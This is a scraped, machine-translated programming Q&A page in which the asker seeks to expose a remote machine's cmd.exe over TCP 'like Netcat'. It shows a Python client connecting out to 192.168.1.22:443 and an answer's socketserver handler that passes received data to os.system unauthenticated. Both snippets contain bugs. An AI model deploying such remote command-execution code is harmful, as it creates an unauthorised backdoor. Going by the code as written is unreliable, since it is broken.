Python Shell通过TCP / IP使用Ctypes执行Windows API
[英]Python Shellexecute windows api with Ctypes over TCP/IP
问题描述
I have question about running windows API's over TCP/IP protocol. 
我对通过TCP / IP协议运行Windows API有疑问。 For example, I want to bring remote machine's cmd.exe to other machine (Like Netcat, fully simulating cmd.exe over TCP/IP) . 例如,我想将远程计算机的cmd.exe带到另一台计算机(如Netcat,通过TCP / IP完全模拟cmd.exe)。 I searched online for doing it with python but couldn't find anything helpful. 我在网上搜索了使用python进行搜索的信息,但找不到任何有用的信息。 I can do this using subprocess and other python capabilities but it lacks user-interface problem. 我可以使用子进程和其他python功能来执行此操作,但是它缺少用户界面问题。 I used this kind of code: 我使用了这种代码:
import socket
import subprocess
import ctypes
HOST = '192.168.1.22'
PORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
while 1:
#send initial cmd.exe banner to remote machine
s.send(ctypes.windll.Shell32.ShellExecuteA(None,"open","cmd.exe",None,None,0))
#accept user input
data = s.recv(1024)
#pass it again to Shellexecute api to execute and return output to remote machine, fully simulating original CMD over TCP/IP
s.close()
Look at to this picture: Running CMD over TCP/IP using NetCat tool 看这张图: 使用NetCat工具在TCP / IP上运行CMD
1 个解决方案
解决方案1
0 2016-09-06 02:24:44
I'm not sure what your need is based on your description is, but I'll try to help you :). 我不确定您的需求基于您的描述,但是我会尽力帮助您:)。
If all you want is to activate the CMD.exe on a remote machine with a port being open, you would maybe like to look into a "server script" that will execute any command passed to it. 如果只需要在打开端口的远程计算机上激活CMD.exe,则可能需要查看“服务器脚本”,该脚本将执行传递给它的任何命令。 ie 即
class MyTCPHandler(socketserver.BaseRequestHandler):
"""
The RequestHandler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
# self.request is the TCP socket connected to the client
self.data = self.request.recv(1024).strip()
print("{} wrote:".format(self.client_address[0]))
print(self.data)
error_code = os.system(self.data.decode('UTF-8'))
# just send back the error code so we know if it executed correctly
self.request.sendall(error_code)
if __file__ is '__main__':
HOST, PORT = "localhost", 9999
# Create the server, binding to localhost on port 9999
server = socketserver.TCPServer((HOST, PORT), MyTCPHandler)
# Activate the server; this will keep running until you
# interrupt the program with Ctrl-C
server.serve_forever()
*ref : https://docs.python.org/3.4/library/socketserver.html I don't need to mention that this is really not secure... * ref: https : //docs.python.org/3.4/library/socketserver.html我不需要提及这确实不安全...
if you really want to pass it to python on the server side, I think I would put everything received on the socket in a tmp file and execute python over it. 如果您真的想将其传递给服务器端的python,我想我会将套接字上收到的所有内容都放入tmp文件中,并在其上执行python。 Like Ansible do. 像Ansible一样。
Let me know if that helped you! 让我知道这是否对您有帮助!
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.